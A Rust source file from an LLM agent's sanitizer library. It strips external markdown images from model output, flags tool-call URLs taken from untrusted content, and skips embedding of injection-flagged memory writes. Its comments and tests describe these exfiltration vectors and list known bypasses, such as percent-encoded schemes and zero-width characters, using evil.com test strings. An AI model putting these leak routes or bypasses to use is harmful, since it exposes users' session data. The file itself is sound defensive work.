zeph_sanitizer/exfiltration.rs
1// SPDX-FileCopyrightText: 2026 Andrei G <bug-ops>
2// SPDX-License-Identifier: MIT OR Apache-2.0
3
4//! Exfiltration guards: prevent LLM-generated content from leaking data via
5//! outbound channels (markdown images, tool URL injection, poisoned memory writes).
6//!
7//! The [`ExfiltrationGuard`] is stateless and covers three attack vectors:
8//!
9//! 1. **Markdown image exfiltration** — an adversary plants ``
10//! in content. When the LLM echoes it, the rendered image loads silently, leaking session data.
11//! [`ExfiltrationGuard::scan_output`] strips these and replaces them with `[image removed: …]`.
12//!
13//! 2. **URL injection via tool calls** — a flagged URL from untrusted tool output appears in a
14//! subsequent tool call argument. [`ExfiltrationGuard::validate_tool_call`] cross-references
15//! URLs against the per-turn flagged URL set. Flag-only approach (does not block execution).
16//!
17//! 3. **Poisoned memory writes** — content flagged with injection patterns is intercepted before
18//! Qdrant embedding. [`ExfiltrationGuard::should_guard_memory_write`] signals the caller to
19//! skip the embedding step, preventing poisoned content from polluting semantic search.
20//!
21//! # Phase 5 TODO
22//! - HTML img tag detection (`<img src="https://...">`) — requires HTML parser
23//! - Unicode zero-width joiner bypass (`!\u{200B}[alt](url)`) — requires Unicode-aware matching
24//! - Both are low-priority: the LLM context wrapper already limits what arrives here
25
26use std::collections::HashSet;
27use std::fmt::Write as _;
28use std::sync::LazyLock;
29
30use regex::Regex;
31use zeph_common::ToolName;
32
33pub use zeph_config::ExfiltrationGuardConfig;
34
35// ---------------------------------------------------------------------------
36// Regex patterns
37// ---------------------------------------------------------------------------
38
39/// Matches inline markdown images with external http/https URLs:
40/// ``
41///
42/// Local paths (`./img.png`) and data URIs (`data:image/...`) are intentionally
43/// excluded — they cannot exfiltrate data to a remote server.
44static MARKDOWN_IMAGE_RE: LazyLock<Regex> = LazyLock::new(|| {
45 Regex::new(r"!\[([^\]]*)\]\((https?://[^)]+)\)").expect("valid MARKDOWN_IMAGE_RE")
46});
47
48/// Matches reference-style markdown image declarations: `[ref]: https://example.com/img`
49/// Used in conjunction with `REFERENCE_LABEL_RE` to detect two-part reference images.
50static REFERENCE_DEF_RE: LazyLock<Regex> = LazyLock::new(|| {
51 Regex::new(r"(?m)^\[([^\]]+)\]:\s*(https?://\S+)").expect("valid REFERENCE_DEF_RE")
52});
53
54/// Matches reference-style image usages: `![alt][ref]`
55static REFERENCE_USAGE_RE: LazyLock<Regex> =
56 LazyLock::new(|| Regex::new(r"!\[([^\]]*)\]\[([^\]]+)\]").expect("valid REFERENCE_USAGE_RE"));
57
58/// Extracts http/https URLs from arbitrary text (used for tool argument scanning).
59static URL_EXTRACT_RE: LazyLock<Regex> =
60 LazyLock::new(|| Regex::new(r#"https?://[^\s"'<>]+"#).expect("valid URL_EXTRACT_RE"));
61
62// ---------------------------------------------------------------------------
63// Event types
64// ---------------------------------------------------------------------------
65
66/// An exfiltration event detected by [`ExfiltrationGuard`].
67///
68/// Events are advisory: they are logged, counted, and returned to the caller for
69/// further action. The guard itself never panics or blocks the agent loop.
70///
71/// # Examples
72///
73/// ```rust
74/// use zeph_sanitizer::exfiltration::{ExfiltrationGuard, ExfiltrationEvent};
75/// use zeph_config::ExfiltrationGuardConfig;
76///
77/// let guard = ExfiltrationGuard::new(ExfiltrationGuardConfig::default());
78/// let (cleaned, events) = guard.scan_output("");
79/// assert_eq!(events.len(), 1);
80/// assert!(matches!(&events[0], ExfiltrationEvent::MarkdownImageBlocked { url } if url.contains("evil.com")));
81/// ```
82#[derive(Debug, Clone, PartialEq)]
83pub enum ExfiltrationEvent {
84 /// A markdown image with an external URL was stripped from LLM output.
85 MarkdownImageBlocked { url: String },
86 /// A tool call argument contained a URL that appeared in untrusted flagged content.
87 SuspiciousToolUrl { url: String, tool_name: ToolName },
88 /// A memory write was intercepted because the content had injection flags.
89 MemoryWriteGuarded { reason: String },
90}
91
92// ---------------------------------------------------------------------------
93// Guard
94// ---------------------------------------------------------------------------
95
96/// Stateless exfiltration guard covering three outbound leak vectors.
97///
98/// Construct once from [`ExfiltrationGuardConfig`] and store on the agent. Cheap to clone.
99/// All three scanners ([`scan_output`](Self::scan_output),
100/// [`validate_tool_call`](Self::validate_tool_call),
101/// [`should_guard_memory_write`](Self::should_guard_memory_write)) are independently
102/// toggled via the config flags `block_markdown_images`, `validate_tool_urls`, and
103/// `guard_memory_writes`.
104///
105/// # Examples
106///
107/// ```rust
108/// use zeph_sanitizer::exfiltration::ExfiltrationGuard;
109/// use zeph_config::ExfiltrationGuardConfig;
110///
111/// let guard = ExfiltrationGuard::new(ExfiltrationGuardConfig::default());
112///
113/// // Strips external tracking pixels from LLM output.
114/// let (cleaned, events) = guard.scan_output("text  end");
115/// assert!(events.len() == 1);
116/// assert!(!cleaned.contains("![track]"));
117///
118/// // Memory write is guarded when injection flags are present.
119/// let event = guard.should_guard_memory_write(true);
120/// assert!(event.is_some());
121/// ```
122#[derive(Debug, Clone)]
123pub struct ExfiltrationGuard {
124 config: ExfiltrationGuardConfig,
125}
126
127impl ExfiltrationGuard {
128 /// Create a new guard from the given configuration.
129 ///
130 /// # Examples
131 ///
132 /// ```rust
133 /// use zeph_sanitizer::exfiltration::ExfiltrationGuard;
134 /// use zeph_config::ExfiltrationGuardConfig;
135 ///
136 /// let guard = ExfiltrationGuard::new(ExfiltrationGuardConfig::default());
137 /// ```
138 #[must_use]
139 pub fn new(config: ExfiltrationGuardConfig) -> Self {
140 Self { config }
141 }
142
143 /// Scan LLM output text and strip external markdown images.
144 ///
145 /// Returns the cleaned text and a list of [`ExfiltrationEvent::MarkdownImageBlocked`]
146 /// for each image that was removed.
147 ///
148 /// When `block_markdown_images` is `false`, returns the input unchanged.
149 ///
150 /// # Scanning coverage
151 /// - Inline images: ``
152 /// - Reference-style images: `![alt][ref]` + `[ref]: https://evil.com/img`
153 /// - Percent-encoded URLs inside already-captured groups: decoded before `is_external_url()`
154 ///
155 /// # Not covered (Phase 5, tracked in #1195)
156 /// - Percent-encoded scheme bypass: `%68ttps://evil.com` — the regex requires literal
157 /// `https?://`, so a percent-encoded scheme is never captured. Fix requires pre-decoding
158 /// the full input text before regex matching.
159 /// - HTML `<img src="...">` tags
160 /// - Unicode zero-width joiner tricks (`!\u{200B}[alt](url)`)
161 /// - Reference definitions inside fenced code blocks (false positive risk)
162 ///
163 /// # Panics
164 ///
165 /// Panics if the compiled regex does not produce expected capture groups (compile-time
166 /// guarantee — the regex patterns are validated via `expect` in `LazyLock` initializers).
167 #[must_use]
168 pub fn scan_output(&self, text: &str) -> (String, Vec<ExfiltrationEvent>) {
169 if !self.config.block_markdown_images {
170 return (text.to_owned(), vec![]);
171 }
172
173 let mut events = Vec::new();
174 let mut result = text.to_owned();
175
176 // --- Pass 1: inline images ---
177 let mut replacement = String::new();
178 let mut last_end = 0usize;
179 for cap in MARKDOWN_IMAGE_RE.captures_iter(text) {
180 let m = cap.get(0).expect("full match");
181 let raw_url = cap.get(2).expect("url group").as_str();
182 let url = percent_decode_url(raw_url);
183
184 if is_external_url(&url) {
185 replacement.push_str(&text[last_end..m.start()]);
186 let _ = write!(replacement, "[image removed: {url}]");
187 last_end = m.end();
188 events.push(ExfiltrationEvent::MarkdownImageBlocked { url });
189 }
190 }
191 if !events.is_empty() || last_end > 0 {
192 replacement.push_str(&text[last_end..]);
193 result = replacement;
194 }
195
196 // --- Pass 2: reference-style images ---
197 // Collect reference definitions from the (already partially cleaned) result.
198 let mut ref_defs: std::collections::HashMap<String, String> =
199 std::collections::HashMap::new();
200 for cap in REFERENCE_DEF_RE.captures_iter(&result) {
201 let label = cap.get(1).expect("label").as_str().to_lowercase();
202 let raw_url = cap.get(2).expect("url").as_str();
203 let url = percent_decode_url(raw_url);
204 if is_external_url(&url) {
205 ref_defs.insert(label, url);
206 }
207 }
208
209 if !ref_defs.is_empty() {
210 // Remove reference usages that point to external defs.
211 let mut cleaned = String::with_capacity(result.len());
212 let mut last_end = 0usize;
213 for cap in REFERENCE_USAGE_RE.captures_iter(&result) {
214 let m = cap.get(0).expect("full match");
215 let label = cap.get(2).expect("label").as_str().to_lowercase();
216 if let Some(url) = ref_defs.get(&label) {
217 cleaned.push_str(&result[last_end..m.start()]);
218 let _ = write!(cleaned, "[image removed: {url}]");
219 last_end = m.end();
220 events.push(ExfiltrationEvent::MarkdownImageBlocked { url: url.clone() });
221 }
222 }
223 cleaned.push_str(&result[last_end..]);
224 result = cleaned;
225
226 // Remove the reference definition lines for blocked refs.
227 // Use split('\n') (not .lines()) to preserve \r in CRLF line endings —
228 // .lines() strips \r, and reconstruction with push('\n') would silently
229 // convert all CRLF to LF throughout the entire text.
230 let mut def_cleaned = String::with_capacity(result.len());
231 for line in result.split('\n') {
232 let mut keep = true;
233 for cap in REFERENCE_DEF_RE.captures_iter(line) {
234 let label = cap.get(1).expect("label").as_str().to_lowercase();
235 if ref_defs.contains_key(&label) {
236 keep = false;
237 break;
238 }
239 }
240 if keep {
241 def_cleaned.push_str(line);
242 def_cleaned.push('\n');
243 }
244 }
245 // Preserve trailing newline behaviour of the original.
246 if !text.ends_with('\n') && def_cleaned.ends_with('\n') {
247 def_cleaned.pop();
248 }
249 result = def_cleaned;
250 }
251
252 (result, events)
253 }
254
255 /// Validate tool call arguments against a set of URLs flagged in untrusted content.
256 ///
257 /// Parses `args_json` as a JSON value and extracts all string leaves recursively to
258 /// avoid JSON-encoding bypasses (escaped slashes, unicode escapes, etc.).
259 ///
260 /// Returns one [`ExfiltrationEvent::SuspiciousToolUrl`] per matching URL.
261 /// When `validate_tool_urls` is `false`, always returns an empty vec.
262 ///
263 /// # Flag-only approach
264 /// Matching URLs are logged and counted but tool execution is NOT blocked. Blocking
265 /// would break legitimate workflows where the same URL appears in both a search result
266 /// and a subsequent fetch call. See design decision D1 in the architect handoff.
267 #[must_use]
268 pub fn validate_tool_call(
269 &self,
270 tool_name: &str,
271 args_json: &str,
272 flagged_urls: &HashSet<String>,
273 ) -> Vec<ExfiltrationEvent> {
274 if !self.config.validate_tool_urls || flagged_urls.is_empty() {
275 return vec![];
276 }
277
278 let parsed: serde_json::Value = match serde_json::from_str(args_json) {
279 Ok(v) => v,
280 Err(_) => {
281 // Fall back to raw regex scan if JSON is malformed.
282 return Self::scan_raw_args(tool_name, args_json, flagged_urls);
283 }
284 };
285
286 let mut events = Vec::new();
287 let mut strings = Vec::new();
288 collect_strings(&parsed, &mut strings);
289
290 for s in &strings {
291 for url_match in URL_EXTRACT_RE.find_iter(s) {
292 let url = url_match.as_str();
293 if flagged_urls.contains(url) {
294 events.push(ExfiltrationEvent::SuspiciousToolUrl {
295 url: url.to_owned(),
296 tool_name: tool_name.into(),
297 });
298 }
299 }
300 }
301
302 events
303 }
304
305 /// Check whether a memory write should skip Qdrant embedding.
306 ///
307 /// Returns `Some(MemoryWriteGuarded)` when `has_injection_flags` is `true` and
308 /// `guard_memory_writes` is enabled. The caller should still save to `SQLite` for
309 /// conversation continuity but omit the Qdrant embedding to prevent poisoned content
310 /// from polluting semantic search results.
311 ///
312 /// See design decision D2 in the architect handoff.
313 #[must_use]
314 pub fn should_guard_memory_write(
315 &self,
316 has_injection_flags: bool,
317 ) -> Option<ExfiltrationEvent> {
318 if !self.config.guard_memory_writes || !has_injection_flags {
319 return None;
320 }
321 Some(ExfiltrationEvent::MemoryWriteGuarded {
322 reason: "content contained injection patterns flagged by ContentSanitizer".to_owned(),
323 })
324 }
325
326 /// Extract URLs from untrusted tool output for use in subsequent `validate_tool_call` checks.
327 ///
328 fn scan_raw_args(
329 tool_name: &str,
330 args: &str,
331 flagged_urls: &HashSet<String>,
332 ) -> Vec<ExfiltrationEvent> {
333 URL_EXTRACT_RE
334 .find_iter(args)
335 .filter(|m| flagged_urls.contains(m.as_str()))
336 .map(|m| ExfiltrationEvent::SuspiciousToolUrl {
337 url: m.as_str().to_owned(),
338 tool_name: tool_name.into(),
339 })
340 .collect()
341 }
342}
343
344/// Extract all `http`/`https` URLs from `content` into a `HashSet` for later URL validation.
345///
346/// Call this after sanitizing untrusted tool output with `ContentSanitizer` when injection
347/// flags are present. Pass the returned set into the agent's `flagged_urls` field. Pass that
348/// set to [`ExfiltrationGuard::validate_tool_call`] on each subsequent tool call. Clear
349/// `flagged_urls` at the start of each `process_response` call (per-turn clearing strategy).
350///
351/// # Examples
352///
353/// ```rust
354/// use zeph_sanitizer::exfiltration::extract_flagged_urls;
355///
356/// let urls = extract_flagged_urls("visit https://evil.com/x and https://other.com/y");
357/// assert!(urls.contains("https://evil.com/x"));
358/// assert!(urls.contains("https://other.com/y"));
359/// assert_eq!(urls.len(), 2);
360/// ```
361#[must_use]
362pub fn extract_flagged_urls(content: &str) -> HashSet<String> {
363 URL_EXTRACT_RE
364 .find_iter(content)
365 .map(|m| m.as_str().to_owned())
366 .collect()
367}
368
369// ---------------------------------------------------------------------------
370// Helpers
371// ---------------------------------------------------------------------------
372
373/// Decode percent-encoded URL characters before exfiltration matching.
374///
375/// Converts `%68ttps://` → `https://` so simple percent-encoding bypasses are caught.
376/// Non-UTF-8 sequences are left as-is (they won't match `is_external_url`).
377fn percent_decode_url(raw: &str) -> String {
378 let mut out = String::with_capacity(raw.len());
379 let bytes = raw.as_bytes();
380 let mut i = 0;
381 while i < bytes.len() {
382 if bytes[i] == b'%'
383 && i + 2 < bytes.len()
384 && let (Some(hi), Some(lo)) = (
385 (bytes[i + 1] as char).to_digit(16),
386 (bytes[i + 2] as char).to_digit(16),
387 )
388 {
389 // hi and lo are 0-15; combined value is at most 0xFF, fits in u8.
390 #[allow(clippy::cast_possible_truncation)]
391 let byte = ((hi << 4) | lo) as u8;
392 out.push(byte as char);
393 i += 3;
394 continue;
395 }
396 out.push(bytes[i] as char);
397 i += 1;
398 }
399 out
400}
401
402fn is_external_url(url: &str) -> bool {
403 url.starts_with("http://") || url.starts_with("https://")
404}
405
406/// Recursively collect all string leaves from a JSON value.
407fn collect_strings<'a>(value: &'a serde_json::Value, out: &mut Vec<&'a str>) {
408 match value {
409 serde_json::Value::String(s) => out.push(s.as_str()),
410 serde_json::Value::Array(arr) => {
411 for v in arr {
412 collect_strings(v, out);
413 }
414 }
415 serde_json::Value::Object(map) => {
416 for v in map.values() {
417 collect_strings(v, out);
418 }
419 }
420 _ => {}
421 }
422}
423
424// ---------------------------------------------------------------------------
425// Tests
426// ---------------------------------------------------------------------------
427
428#[cfg(test)]
429mod tests {
430 use super::*;
431
432 fn guard() -> ExfiltrationGuard {
433 ExfiltrationGuard::new(ExfiltrationGuardConfig::default())
434 }
435
436 fn guard_disabled() -> ExfiltrationGuard {
437 ExfiltrationGuard::new(ExfiltrationGuardConfig {
438 block_markdown_images: false,
439 validate_tool_urls: false,
440 guard_memory_writes: false,
441 })
442 }
443
444 // --- scan_output ---
445
446 #[test]
447 fn strips_external_inline_image() {
448 let (cleaned, events) =
449 guard().scan_output("Before  after");
450 assert_eq!(
451 cleaned,
452 "Before [image removed: https://evil.com/p.gif] after"
453 );
454 assert_eq!(events.len(), 1);
455 assert!(
456 matches!(&events[0], ExfiltrationEvent::MarkdownImageBlocked { url } if url == "https://evil.com/p.gif")
457 );
458 }
459
460 #[test]
461 fn preserves_local_image() {
462 let text = "Look:  — local";
463 let (cleaned, events) = guard().scan_output(text);
464 assert_eq!(cleaned, text);
465 assert!(events.is_empty());
466 }
467
468 #[test]
469 fn preserves_data_uri() {
470 let text = "Inline: ";
471 let (cleaned, events) = guard().scan_output(text);
472 assert_eq!(cleaned, text);
473 assert!(events.is_empty());
474 }
475
476 #[test]
477 fn strips_multiple_external_images() {
478 let text = " text ";
479 let (cleaned, events) = guard().scan_output(text);
480 // Markdown image syntax must be removed; replacement label may contain URLs.
481 assert!(
482 !cleaned.contains(",
483 "first image syntax must be removed: {cleaned}"
484 );
485 assert!(
486 !cleaned.contains(",
487 "second image syntax must be removed: {cleaned}"
488 );
489 assert_eq!(events.len(), 2);
490 }
491
492 #[test]
493 fn scan_output_noop_when_disabled() {
494 let text = "";
495 let (cleaned, events) = guard_disabled().scan_output(text);
496 assert_eq!(cleaned, text);
497 assert!(events.is_empty());
498 }
499
500 #[test]
501 fn strips_reference_style_image() {
502 let text = "Here is the image: ![alt][ref]\n[ref]: https://evil.com/track.gif\nend";
503 let (cleaned, events) = guard().scan_output(text);
504 // The markdown image syntax and definition line must be removed.
505 assert!(
506 !cleaned.contains("![alt][ref]"),
507 "image usage syntax must be removed: {cleaned}"
508 );
509 assert!(
510 !cleaned.contains("[ref]:"),
511 "reference definition must be removed: {cleaned}"
512 );
513 assert!(
514 cleaned.contains("[image removed:"),
515 "replacement label must be present: {cleaned}"
516 );
517 assert!(!events.is_empty(), "must generate event");
518 }
519
520 #[test]
521 fn preserves_local_reference_image() {
522 // Reference pointing to a local path — must not be stripped.
523 let text = "![alt][ref]\n[ref]: ./local.png\n";
524 let (cleaned, events) = guard().scan_output(text);
525 assert_eq!(cleaned, text);
526 assert!(events.is_empty());
527 }
528
529 #[test]
530 fn decodes_percent_encoded_url_in_inline_image() {
531 // %68 = 'h', so %68ttps:// decodes to https://.
532 // The MARKDOWN_IMAGE_RE pattern requires a literal `https?://` prefix, so
533 // `%68ttps://` is NOT matched by the regex and passes through unchanged.
534 // percent_decode_url() is called on the URL *after* the regex captures it —
535 // so percent-encoded schemes bypass inline detection.
536 //
537 // Known bypass — tracked for Phase 5 (#1195): the fix requires pre-decoding the
538 // full text before regex matching (or a multi-pass decode+scan approach). The LLM
539 // context wrapper already limits what arrives here, reducing practical risk.
540 let text = "";
541 let (cleaned, _events) = guard().scan_output(text);
542 // The text passes through unchanged because the regex didn't match.
543 assert_eq!(
544 cleaned, text,
545 "percent-encoded scheme not detected by inline regex"
546 );
547
548 // A normal https:// URL IS detected.
549 let normal = "";
550 let (normal_cleaned, normal_events) = guard().scan_output(normal);
551 assert!(
552 !normal_cleaned.contains(",
553 "normal URL must be removed"
554 );
555 assert_eq!(normal_events.len(), 1);
556 }
557
558 #[test]
559 fn empty_alt_text_still_blocked() {
560 let text = "";
561 let (cleaned, events) = guard().scan_output(text);
562 // The original markdown image syntax must be removed; the replacement label may contain the URL.
563 assert!(
564 !cleaned.contains(",
565 "markdown image syntax must be removed: {cleaned}"
566 );
567 assert!(
568 cleaned.contains("[image removed:"),
569 "replacement label must be present: {cleaned}"
570 );
571 assert_eq!(events.len(), 1);
572 }
573
574 // --- validate_tool_call ---
575
576 #[test]
577 fn detects_flagged_url_in_json_string() {
578 let mut flagged = HashSet::new();
579 flagged.insert("https://evil.com/payload".to_owned());
580 let args = r#"{"url": "https://evil.com/payload"}"#;
581 let events = guard().validate_tool_call("fetch", args, &flagged);
582 assert_eq!(events.len(), 1);
583 assert!(
584 matches!(&events[0], ExfiltrationEvent::SuspiciousToolUrl { url, tool_name }
585 if url == "https://evil.com/payload" && tool_name == "fetch")
586 );
587 }
588
589 #[test]
590 fn no_event_when_url_not_flagged() {
591 let mut flagged = HashSet::new();
592 flagged.insert("https://other.com/benign".to_owned());
593 let args = r#"{"url": "https://legitimate.com/page"}"#;
594 let events = guard().validate_tool_call("fetch", args, &flagged);
595 assert!(events.is_empty());
596 }
597
598 #[test]
599 fn validate_tool_call_noop_when_disabled() {
600 let mut flagged = HashSet::new();
601 flagged.insert("https://evil.com/x".to_owned());
602 let args = r#"{"url": "https://evil.com/x"}"#;
603 let events = guard_disabled().validate_tool_call("fetch", args, &flagged);
604 assert!(events.is_empty());
605 }
606
607 #[test]
608 fn validate_tool_call_noop_with_empty_flagged() {
609 let args = r#"{"url": "https://evil.com/x"}"#;
610 let events = guard().validate_tool_call("fetch", args, &HashSet::new());
611 assert!(events.is_empty());
612 }
613
614 #[test]
615 fn extracts_urls_from_nested_json() {
616 let mut flagged = HashSet::new();
617 flagged.insert("https://evil.com/deep".to_owned());
618 let args = r#"{"nested": {"inner": ["https://evil.com/deep"]}}"#;
619 let events = guard().validate_tool_call("tool", args, &flagged);
620 assert_eq!(events.len(), 1);
621 }
622
623 #[test]
624 fn handles_escaped_slashes_in_json() {
625 // JSON-encoded URL with escaped forward slashes should still be detected
626 // after serde_json parsing (which unescapes the string value).
627 let mut flagged = HashSet::new();
628 flagged.insert("https://evil.com/path".to_owned());
629 // serde_json will unescape \/ → /
630 let args = r#"{"url": "https:\/\/evil.com\/path"}"#;
631 let parsed: serde_json::Value = serde_json::from_str(args).unwrap();
632 // Confirm serde_json unescapes it.
633 assert_eq!(parsed["url"], "https://evil.com/path");
634 let events = guard().validate_tool_call("fetch", args, &flagged);
635 assert_eq!(events.len(), 1, "JSON-escaped URL must be caught");
636 }
637
638 // --- should_guard_memory_write ---
639
640 #[test]
641 fn guards_when_injection_flags_set() {
642 let event = guard().should_guard_memory_write(true);
643 assert!(event.is_some());
644 assert!(matches!(
645 event.unwrap(),
646 ExfiltrationEvent::MemoryWriteGuarded { .. }
647 ));
648 }
649
650 #[test]
651 fn passes_when_no_injection_flags() {
652 let event = guard().should_guard_memory_write(false);
653 assert!(event.is_none());
654 }
655
656 #[test]
657 fn guard_memory_write_noop_when_disabled() {
658 let event = guard_disabled().should_guard_memory_write(true);
659 assert!(event.is_none());
660 }
661
662 // --- percent_decode_url ---
663
664 #[test]
665 fn percent_decode_roundtrip() {
666 assert_eq!(
667 percent_decode_url("https://example.com"),
668 "https://example.com"
669 );
670 assert_eq!(
671 percent_decode_url("%68ttps://example.com"),
672 "https://example.com"
673 );
674 assert_eq!(percent_decode_url("hello%20world"), "hello world");
675 }
676
677 // --- extract_flagged_urls ---
678
679 #[test]
680 fn extracts_urls_from_plain_text() {
681 let content = "check https://evil.com/x and https://other.com/y for details";
682 let urls = extract_flagged_urls(content);
683 assert!(urls.contains("https://evil.com/x"));
684 assert!(urls.contains("https://other.com/y"));
685 }
686}